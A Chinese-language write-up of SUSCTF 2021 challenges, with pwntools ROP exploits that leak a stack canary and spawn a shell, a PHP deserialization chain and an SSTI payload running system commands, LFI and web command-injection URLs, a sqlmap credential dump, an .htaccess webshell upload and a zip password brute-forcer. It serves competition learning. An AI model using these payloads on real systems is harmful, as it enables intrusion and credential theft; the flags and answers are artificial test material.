WP-SUS 2021
Pwn
babyrop
#安全机制查看
pwndbg> checksec
[*] '/home/vincebye/ctf/babyrop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
#F5后的主函数
// local variable allocation has failed, the output may be wrong!
// IDA Hex-Rays output for babyrop's main(); review comments added.
// Frame layout from the offsets IDA prints: buf at rbp-0x50, v6 at rbp-0x30,
// the saved canary v7 at rbp-0x8.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    int result; // eax@1
    __int64 v4; // rcx@1
    char buf; // [sp+0h] [bp-50h]@1
    char v6; // [sp+20h] [bp-30h]@1
    __int64 v7; // [sp+48h] [bp-8h]@1

    v7 = *MK_FP(__FS__, 40LL); // copy of the stack canary from fs:0x28
    welcome(*(_QWORD *)&argc, argv, envp);
    puts("input your name:");
    // 0x50 bytes written from rbp-0x50 extend to rbp, i.e. across the canary
    // slot at rbp-0x8, and read() stores no terminating NUL.
    read(0, &buf, 0x50uLL);
    // puts() prints up to the first NUL byte, so bytes that follow the input on
    // the stack are echoed together with it (this is the information leak).
    puts(&buf);
    puts("tell me something");
    // 0x50 bytes from rbp-0x30 extend to rbp+0x20: over the canary, the saved
    // rbp and the return address (this is the overflow).
    read(0, &v6, 0x50uLL);
    puts("it's your secrect,keep it!");
    result = 0;
    // Canary check; the __stack_chk_fail path it feeds is not shown in this
    // listing (the symbol is imported, see the rabin2 output).
    v4 = *MK_FP(__FS__, 40LL) ^ v7;
    return result;
}
#所需字符串的地址
6 0x00000bca 0x00400bca 7 8 .rodata ascii /bin/sh
#查询此程序相关信息
vincebye@ubuntu:~/ctf$ rabin2 -z babyrop
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x000008f8 0x004008f8 117 118 .rodata ascii .__ __ __ _____
1 0x00000970 0x00400970 118 119 .rodata ascii __ _ __ ____ | | ____ ____ _____ ____ _/ |_ ____ ______ __ __ ______ ____ _/ |_ _/ ____\\
2 0x000009e8 0x004009e8 117 118 .rodata ascii \\ \\/ \\/ /_/ __ \\ | | _/ ___\\ / _ \\ / \\ _/ __ \\ \\ __\\/ _ \\ / ___/| | \\/ ___/_/ ___\\\\ __\\\\ __\\
3 0x00000a60 0x00400a60 119 120 .rodata ascii \\ / \\ ___/ | |__\\ \\___( <_> )| Y Y \\\\ ___/ | | ( <_> ) \\___ \\ | | /\\___ \\ \\ \\___ | | | |
4 0x00000ad8 0x00400ad8 117 118 .rodata ascii \\/\\_/ \\___ >|____/ \\___ >\\____/ |__|_| / \\___ > |__| \\____/ /____ >|____//____ > \\___ >|__| |__|
5 0x00000b50 0x00400b50 117 118 .rodata ascii \\/ \\/ \\/ \\/ \\/ \\/ \\/
6 0x00000bca 0x00400bca 7 8 .rodata ascii /bin/sh
7 0x00000bd3 0x00400bd3 16 17 .rodata ascii input your name:
8 0x00000be4 0x00400be4 17 18 .rodata ascii tell me something
9 0x00000bf6 0x00400bf6 26 27 .rodata ascii it's your secrect,keep it!
vincebye@ubuntu:~/ctf$ rabin2 -i babyrop
[Imports]
nth vaddr bind type lib name
―――――――――――――――――――――――――――――――――――――
1 0x004005c0 GLOBAL FUNC puts
2 0x004005d0 GLOBAL FUNC __stack_chk_fail
3 0x004005e0 GLOBAL FUNC system
4 0x004005f0 GLOBAL FUNC read
5 0x00400600 GLOBAL FUNC __libc_start_main
6 0x00000000 WEAK NOTYPE __gmon_start__
7 0x00400610 GLOBAL FUNC setvbuf
vincebye@ubuntu:~/ctf$ rabin2 -qs babyrop |grep -ve imp -e ' 0 '
0x00601060 8 stdout
0x00601070 8 stdin
0x00601080 8 stderr
0x00601088 1 completed.7594
0x00601058 8 hint
0x004008e0 2 __libc_csu_fini
0x00601060 8 stdout@@GLIBC_2.2.5
0x00601070 8 stdin@@GLIBC_2.2.5
0x004007c2 21 vlun
0x00400726 156 welcome
0x004008f0 4 _IO_stdin_used
0x00400870 101 __libc_csu_init
0x00400630 42 _start
0x004007d7 151 main
0x00601080 8 stderr@@GLIBC_2.2.5
vincebye@ubuntu:~/ctf$ ROPgadget --binary babyrop --only "pop|ret" |grep rdi
0x00000000004008d3 : pop rdi ; ret
pwndbg> disassemble vlun
Dump of assembler code for function vlun:
0x00000000004007c2 <+0>: push rbp
0x00000000004007c3 <+1>: mov rbp,rsp
0x00000000004007c6 <+4>: mov edi,0x400bc6
0x00000000004007cb <+9>: mov eax,0x0
0x00000000004007d0 <+14>: call 0x4005e0 <system@plt>
0x00000000004007d5 <+19>: pop rbp
0x00000000004007d6 <+20>: ret
End of assembler dump.
#位置信息
v6位置RBP-30h
buf位置rbp-50h
canary的位置rbp-8h
v6偏移0x28处为canary
buf偏移0x48处canary
最终payload
from pwn import *
p = remote('39.108.208.104', 2222)
#p = process('./babyrop')
# Stage 1 (leak): buf sits 0x50 bytes below rbp and the canary at rbp-8, so
# 0x48 bytes plus the newline sendline() appends reach the canary's low byte;
# puts() then echoes the remaining seven canary bytes right after the A's.
payload = b"A" * 0x48
p.sendlineafter("input your name:", payload)
p.recvuntil(b"A" * 0x48 + b'\\n')
# The canary's lowest byte is a NUL, which is why 7 bytes are read and padded.
canary = u64(p.recv(7).rjust(8, b'\\x00'))
print ("canary=>" +hex(canary))
# Stage 2: v6 is at rbp-0x30, so 0x28 bytes of padding reach the canary slot
# (refilled with the leaked value), 8 more cover the saved rbp, then the
# return address: pop rdi; ret, the "/bin/sh" string, the call to system@plt
# inside vlun().
payload=b'A'*0x28+p64(int(canary))+b'B'*8+p64(0x00000000004008d3)+p64(0x00400bca)+p64(0x00000000004007d0)
p.sendlineafter("tell me something\\n", payload)
p.interactive()
babyStack
pwndbg> cyclic -l kaaa
40
vincebye@ubuntu:~/ctf$ rabin2 -z stack
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x000007f4 0x004007f4 7 8 .rodata ascii /bin/sh
1 0x000007fc 0x004007fc 18 19 .rodata ascii welcom to sus ctf!
2 0x0000080f 0x0040080f 19 20 .rodata ascii input your payload!
vincebye@ubuntu:~/ctf$ rabin2 -i stack
[Imports]
nth vaddr bind type lib name
―――――――――――――――――――――――――――――――――――――
1 0x00400560 GLOBAL FUNC puts
2 0x00400570 GLOBAL FUNC system
3 0x00400580 GLOBAL FUNC read
4 0x00400590 GLOBAL FUNC __libc_start_main
5 0x00000000 WEAK NOTYPE __gmon_start__
6 0x004005a0 GLOBAL FUNC setvbuf
vincebye@ubuntu:~/ctf$ rabin2 -qs stack | grep -ve imp -e ' 0 '
0x00601060 8 stdout
0x00601070 8 stdin
0x00601080 8 stderr
0x00601088 1 completed.7594
0x004007e0 2 __libc_csu_fini
0x00601060 8 stdout@@GLIBC_2.2.5
0x00601070 8 stdin@@GLIBC_2.2.5
0x004007f0 4 _IO_stdin_used
0x00400770 101 __libc_csu_init
0x004005c0 42 _start
0x004006cb 152 main
0x004006b6 21 shell
0x00601080 8 stderr@@GLIBC_2.2.5
pwndbg> checksec
[*] '/home/vincebye/ctf/stack'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
vincebye@ubuntu:~/ctf$ ROPgadget --binary stack --only "pop|ret" |grep rdi
0x00000000004007d3 : pop rdi ; ret
pwndbg> disassemble shell
Dump of assembler code for function shell:
0x00000000004006b6 <+0>: push rbp
0x00000000004006b7 <+1>: mov rbp,rsp
0x00000000004006ba <+4>: mov edi,0x4007f4
0x00000000004006bf <+9>: mov eax,0x0
0x00000000004006c4 <+14>: call 0x400570 <system@plt>
0x00000000004006c9 <+19>: pop rbp
0x00000000004006ca <+20>: ret
End of assembler dump.
from pwn import *
#p=process("./stack")
p=remote('39.108.208.104',2225)
# No canary in this binary (checksec), so the 40 bytes of padding reported by
# `cyclic -l kaaa` reach the saved return address directly; after it come
# pop rdi; ret, the "/bin/sh" string and the call to system@plt inside shell().
payload=b'a'*40
payload+=p64(0x00000000004007d3)
payload+=p64(0x004007f4)
payload+=p64(0x00000000004006c4)
p.sendlineafter("input your payload!\\n",payload)
p.interactive()
babync
nc上去ls然后cat就行
babyida_pwn
IDA一键F5
// IDA Hex-Rays output for babyida_pwn's main(); review comments added.
int __cdecl main(int argc, const char **argv, const char **envp)
{
    int v4; // [rsp+0h] [rbp-10h] BYREF
    int v5; // [rsp+4h] [rbp-Ch]
    unsigned __int64 v6; // [rsp+8h] [rbp-8h]

    v6 = __readfsqword(0x28u); // copy of the stack canary
    // Mode 2 is _IONBF on glibc: all three standard streams become unbuffered.
    setvbuf(stdin, 0LL, 2, 0LL);
    setvbuf(stderr, 0LL, 2, 0LL);
    setvbuf(stdout, 0LL, 2, 0LL);
    v5 = 2222; // the expected "code"
    // Re-prompt until the number read equals v5. A failed "%d" conversion
    // leaves v4 untouched, so on a first failed parse the compare reads an
    // uninitialised int.
    do
    {
        puts("give me your code:");
        __isoc99_scanf("%d", &v4);
    }
    while ( v5 != v4 );
    return system("/bin/sh"); // the intended flow: the right code spawns a shell
}
输入2222然后拿到shell
Crypto
babyFlower
https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo处解密得到
HFHXGU
http://www.hiencode.com/atbash.html处解密得到
susctf{h3llo_crypt0~}
再按照HFHXGU{S3ool_XIBKG0~}中各字母的大小写,对应地转换解密结果的大小写,得到flag
社会主义核心价值观
http://www.hiencode.com/cvencode.html直接解密
Web
justeval
<http://223.3.85.86:11445/index.php?a=include$_GET[b]?%3E&b=php://filter/read=convert.base64-encode/resource=flag.php>
asoul.icu
import requests
# Fetch the page once and dump the decoded body; the flag is found by
# searching the response.
res = requests.get('<http://223.3.85.86:10010>')
print(res.content.decode('utf-8'))
直接请求,然后在回包中搜索
something about basic
www-data权限
<http://223.3.85.86:10715/index.php?a=system(%27find%20/%20-perm%20-u=s%20-type%20f%202%3E/dev/null%27)>;
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/bin/umount
/bin/mount
/bin/su
/cat
<http://223.3.85.86:10715/index.php?a=system(%27/cat%20../../../flag%27)>;
SUSCTF{a0352b2ac01455c7244e2758e13373d5}
PHP Noob
<?php
// Gadget chain for the challenge's unserialize() sink: Start::__destruct()
// echoes $chain, echoing an object invokes its __toString(), and
// End::__toString() hands $cmd to eval().
class Start
{
    public $chain;
    public function __construct()
    {
        $this->chain=new End;
    }
    function __destruct()
    {
        echo $this->chain;
    }
}
class End{
    public $cmd;
    public function __construct()
    {
        // NOTE: system('ls') executes here, on the machine building the payload,
        // and returns only the last line of its output; that line (not PHP code)
        // is what gets serialized into $cmd - hence the corrected generator that
        // stores a literal PHP statement instead.
        $this->cmd=system('ls');
    }
    function __toString(){
        return eval($this->cmd);
    }
}
$a=new Start;
echo urlencode(serialize($a));
?>
SUSCTF
<http://223.3.85.86:13870/index.php?data=O%3A5%3A%22Start%22%3A1%3A%7Bs%3A5%3A%22chain%22%3BO%3A3%3A%22End%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A28%3A%22system%28%27cat+..%2F..%2F..%2Fflag%27%29%3B%22%3B%7D%7D>
PS:注意eval中的内容是php语句,需要在末尾加一个;
修改payload中的__toString()函数不会影响结果
payload
<?php
// Corrected generator: $cmd now holds a literal PHP statement (with the
// trailing ';' that eval() needs), so nothing executes while the payload is
// built; the chain is Start::__destruct -> echo -> End::__toString -> eval.
class Start
{
    public $chain;
    public function __construct()
    {
        $this->chain=new End;
    }
    function __destruct()
    {
        echo $this->chain;
    }
}
class End{
    public $cmd;
    public function __construct()
    {
        $this->cmd='system(\\'cat ../../../flag\\');';
    }
    function __toString(){
        return eval($this->cmd);
    }
}
$a=new Start;
echo urlencode(serialize($a));
?>
easy sql
sqlmap一键跑
copy
F12
SUSCTF
Bind SQL
python sqlmap.py -u "<http://106.15.53.153:10012>" --forms -D ctf -T users -C password,username --dump
+---------------------------+----------+
| admin | admin |
| z33_is_z3ratu1 | z33 |
| GUEST_is_GUEST | GUEST |
| daieren_is_shenxian | daieren |
| lgw_wudi! | lgw |
| lmy_wudi! | lmy |
| k1ee_is_yeye | klee |
| SUSCTF{th1s_1s_y0ur_flag} | flag |
+---------------------------+----------+
SUSCTF
easy_upload
构建.htaccess
<FilesMatch "shana">
SetHandler application/x-httpd-php
</FilesMatch>
禁用JS
构建图片马一句话,然后上传
SUSCTF
easy_robot
http://223.3.85.86:15643/robots.txt
http://223.3.85.86:15643/flag_is_not_h3re.php
abnormal_ssti
过滤关键词
bases class mro
PS:用[]绕过过滤的时候不需要.
{{''['__cla'+'ss__']['__ba'+'ses__'][0]['__subc'+'lasses__']()[100].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")}}
最终:
{{''['__cla'+'ss__']['__ba'+'ses__'][0]['__subc'+'lasses__']()[100].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat ../../../flag').read()")}}
SUSCTF
Re
点开就送
IDA打开
53h ; 'S'
mov [rbp+var_6C], 55h ; 'U'
mov [rbp+var_68], 53h ; 'S'
mov [rbp+var_64], 43h ; 'C'
mov [rbp+var_60], 54h ; 'T'
mov [rbp+var_5C], 46h ; 'F'
mov [rbp+var_58], 7Bh ; '{'
mov [rbp+var_54], 53h ; 'S'
mov [rbp+var_50], 6Fh ; 'o'
mov [rbp+var_4C], 6Fh ; 'o'
mov [rbp+var_48], 6Fh ; 'o'
mov [rbp+var_44], 5Fh ; '_'
mov [rbp+var_40], 65h ; 'e'
mov [rbp+var_3C], 61h ; 'a'
mov [rbp+var_38], 73h ; 's'
mov [rbp+var_34], 79h ; 'y'
mov [rbp+var_30], 7Dh ; '}'
SUSCTF
babyre
.data:0000000000601060 aa_tql db 73h ; DATA XREF: main+F6↑r
.data:0000000000601061 db 6
.data:0000000000601062 db 75h ; u
.data:0000000000601063 db 16h
.data:0000000000601064 db 62h ; b
.data:0000000000601065 db 4
.data:0000000000601066 db 7Fh ;
.data:0000000000601067 db 1Ch
.data:0000000000601068 db 74h ; t
.data:0000000000601069 db 21h ; !
.data:000000000060106A db 7Eh ; ~
.data:000000000060106B db 0Ah
.data:000000000060106C db 3Bh ; ;
.data:000000000060106D db 64h ; d
.data:000000000060106E db 2Ch ; ,
.data:000000000060106F db 6Dh ; m
.data:0000000000601070 db 5Dh ; ]
.data:0000000000601071 db 2
.data:0000000000601072 db 6Eh ; n
.data:0000000000601073 db 5Dh ; ]
.data:0000000000601074 db 14h
.data:0000000000601075 db 4Bh ; K
.data:0000000000601076 db 2Ah ; *
.data:0000000000601077 db 57h ; W
代码
# Byte table copied from .data (aa_tql). The script undoes an XOR chain: the
# first character is the first byte itself, every later one is a[i] ^ a[i-1].
a=[0x73,0x06,0x75,0x16,0x62,
0x04,0x7F,0x1C,0x74,0x21,0x7E,0x0A,0x3B,0x64,
0x2C,0x6D,0x5D,0x02,0x6E,0x5D,0x14,0x4B,0x2A,0x57]

s = chr(a[0])  # 0x73 == 's'
for prev, cur in zip(a, a[1:]):
    s += chr(cur ^ prev)
print(s)

# Swap the case of every ASCII letter; digits and punctuation pass through
# unchanged (the decoded text is pure ASCII, so swapcase() is exactly +/-32).
ss = s.swapcase()
print(ss)
SUSCTF
whitegive
打开文件搜索字符串,在“这是一道非常简单的逆向题”处下断点
jg改成jl
就拿到了
eeeasyre
先用upx脱壳 ,然后用IDA修改了ecx的值为1
然后保存,放进x64dbg,搜索字符串Yeah,you know并下断点,运行到该处后一直按F8单步调试即可得到flag
babyida
MISC
签到
按照WP做的
悲惨世界
doc隐写打开隐藏字符获得
# JavaScript keyCode sequence recovered from the hidden characters in the doc
# (65-90 are 'A'-'Z'; 16 is Shift, 20 is Caps Lock, 8 is Backspace, 188 is comma).
jscode=[20,83,85,83,67,84,70,20,16, 188, 16, 68, 79, 67, 16, 73, 85, 8, 51, 16, 85, 78, 68, 69, 82, 20, 89, 20, 79, 85, 82, 16, 75, 96, 8, 69, 37, 78, 69, 39, 16, 110]
再根据网上js code查表得SUSCTF
# 65-90 a-z
# 20 case
# 83 s
# 85 u
# 67 c
# 84 try
# 70 f
# 16 shift
# 188 comma
# 16 shift
# 68 d
# 79 o
# 8 backspace
# s u s c t f
20,83,85,83,67,84,70,20,->SUSCTF
16, 188, 16, 68, 79, 67, 16, 73, 85,{DocIu
8, 51, 16, 85, 78, 68, 消3Und
69, 82, 20, 89, 20, 79, 85, 82,erYour
16, 75, 96, 8, 69, 37, 78, 69, 39, 16, 110 Ke<ne>}
SUSCTFDOCIUUNDERYOURKENE
SUSCTF{DocI3UnderYourKnee}
# Keep only the letter key codes (65-90 == 'A'-'Z'); Shift, Backspace and
# punctuation codes are dropped, so the result is an all-caps skeleton of
# the typed text.
ss = ''.join(chr(code) for code in jscode if 65 <= code <= 90)
print(ss)
what
首先查看文件,在文件末尾发现了gnp,推测是倒置的png
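# The file ends in "gnp": it is a PNG stored back to front. Reversing the whole
# byte string restores the image. (The write expression was garbled on the
# original page; this is the reconstructed statement.)
with open('flag', 'rb') as f1, open('flag.png', 'wb') as f2:
    f2.write(f1.read()[::-1])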
利用脚本得到图片
tweakpng打开提醒crc码不对
利用下面的脚本得到正确的图片大小
import os
import binascii
import struct
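def find_png_dimensions(data, target_crc, limit=2000):
    """Brute-force the width/height of a PNG whose IHDR dimensions were altered.

    The IHDR CRC covers the chunk type and its 13 data bytes (width, height,
    bit depth, colour type, compression, filter, interlace). With the stored
    CRC known, width and height are the only unknowns, so every pair below
    ``limit`` is tried until the CRC matches.

    data:       raw PNG bytes; IHDR must be the first chunk (the spec requires it).
    target_crc: the CRC-32 stored right after the IHDR data, as an unsigned int.
    limit:      exclusive upper bound tried for both dimensions.
    Returns (width, height) for the first match, or None if nothing matches.
    """
    chunk_type = data[12:16]  # b'IHDR'
    tail = data[24:29]        # bit depth, colour type, compression, filter, interlace
    for width in range(limit):
        # Width does not change in the inner loop, so build its half once.
        # '>I' (unsigned) is the field's real type; for values below 2**31 it
        # yields the same bytes as the original '>i'.
        prefix = chunk_type + struct.pack('>I', width)
        for height in range(limit):
            # The & mask is a no-op on Python 3 and only matters on Python 2.
            crc32 = binascii.crc32(prefix + struct.pack('>I', height) + tail) & 0xffffffff
            if crc32 == target_crc:
                return width, height
    return None


if __name__ == "__main__":
    # Read the image with a context manager (the original left the file open)
    # and take the "current" CRC from bytes 29:33 of the file rather than a
    # hard-coded constant.
    with open("xxx.png", "rb") as f:
        crcbp = f.read()
    stored_crc = struct.unpack('>I', crcbp[29:33])[0]
    found = find_png_dimensions(crcbp, stored_crc)
    if found is not None:
        i, j = found
        print(i, j)
        print('hex:', hex(i), hex(j))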
640 1138
hex: 0x280 0x472
然后利用010修改图片的大小
得到S
再根据栅栏密码解密得到
SUSCTF
脚本小子
from pwn import *
context.log_level = 'debug'  # have pwntools log every byte sent to and received from the target
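def analyse_data(data):
    """Solve one arithmetic question of the form ``A op B = ...``.

    data: the question text as a str; everything after the first '=' is
          ignored. ``op`` is one of '+', '-', '*' and both operands are
          base-10 integers (surrounding whitespace is accepted by int()).
    Returns the integer result, or '' when the text has no '=' or no
    operator, so the caller can test the result against '' before answering.
    Raises ValueError if an operand is not an integer.
    """
    if '=' not in data:
        return ''
    lhs = data.split('=')[0].strip()
    # Locate the operator by position instead of by membership test. Starting
    # at index 1 skips a leading sign, so "-3*4" or "12 - -4" split on the real
    # operator rather than on a negative operand's own '-'. (The original also
    # raised UnboundLocalError when no operator was present; now it returns ''.)
    op_index = next((k for k, ch in enumerate(lhs) if k > 0 and ch in '+-*'), -1)
    if op_index < 0:
        return ''
    num1 = int(lhs[:op_index])
    num2 = int(lhs[op_index + 1:])
    thisflag = lhs[op_index]
    if thisflag == '*':
        return num1 * num2
    if thisflag == '+':
        return num1 + num2
    return num1 - num2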
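p=process("./pwntools")
#p=remote('39.108.208.104',2225)
# First prompt: the 8-byte little-endian "magic number" the binary asks for.
payload=p64(11451409)
p.sendlineafter("Give me the magic number :)",payload)
a=p.recvuntil('Complete 1000 math questions in 90 seconds!!!\\n')
print(a)
# Then answer the questions as they arrive; each one ends with '?'.
while True:
    print('loop')
    question=p.recvuntil('?')
    if question!=b'\\n' and question:
        print(question)
        question=str(question, encoding = "utf-8")
        print('question')
        print(question)
        result1=analyse_data(question)
        print('analysed')
        print(result1)
        # analyse_data() returns '' when it could not parse the question. A
        # genuine answer of 0 is falsy as well, so compare against '' instead
        # of testing truthiness: the original `if result1:` silently skipped
        # zero answers, leaving that question unanswered.
        if result1 != '':
            p.send(str(result1))
            print('sended')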
SUSCTF{caae1895c78453660a6981837998e9a8}
温,温柔点
import zipfile
import os
import time
import sys
os.chdir(r'I:\\BaiduNetdiskDownload\\wrd')  # folder holding the zip and the word list 'dic'
start_time = time.time()  # wall-clock start; read again when the password is found
# Name of the first *.zip in the current directory, or None if there is none.
def get_zipfile():
    candidates = (name for name in os.listdir() if name.endswith('.zip'))
    return next(candidates, None)
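# Try every line of the word list 'dic' as the password of the zip in the
# current directory; on success extract it, report the elapsed time and exit.
def extract():
    file = get_zipfile()
    if file is None:
        # The original swallowed this inside its broad except and looped
        # silently over the whole word list; fail loudly instead.
        raise FileNotFoundError('no .zip file in the current directory')
    # Open the archive once for the whole run: the original re-opened it for
    # every candidate password and never closed it.
    with zipfile.ZipFile(file) as zfile, open('dic', 'r') as f:
        for i in f.readlines():
            pwd = str(i.strip('\\n'))
            try:
                zfile.extractall(path='.', pwd=pwd.encode('utf-8'))
            except Exception:
                # zipfile reports a wrong password through more than one
                # exception type (RuntimeError, BadZipFile, decompression
                # errors), so the catch stays broad and moves on.
                continue
            print('解压密码是:', pwd)
            end_time = time.time()
            print('单线程破解压缩包花了%s秒' % (end_time - start_time))
            sys.exit(0)  # stop as soon as the password is known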
if __name__ == "__main__":
    extract()  # run the word-list search only when invoked as a script
利用这个脚本,根据提供的字典进行爆破
解压密码是: 1q2w3e4r5tyuiop 单线程破解压缩包花了7.111937761306763秒
然后拿到图片,flag在图片上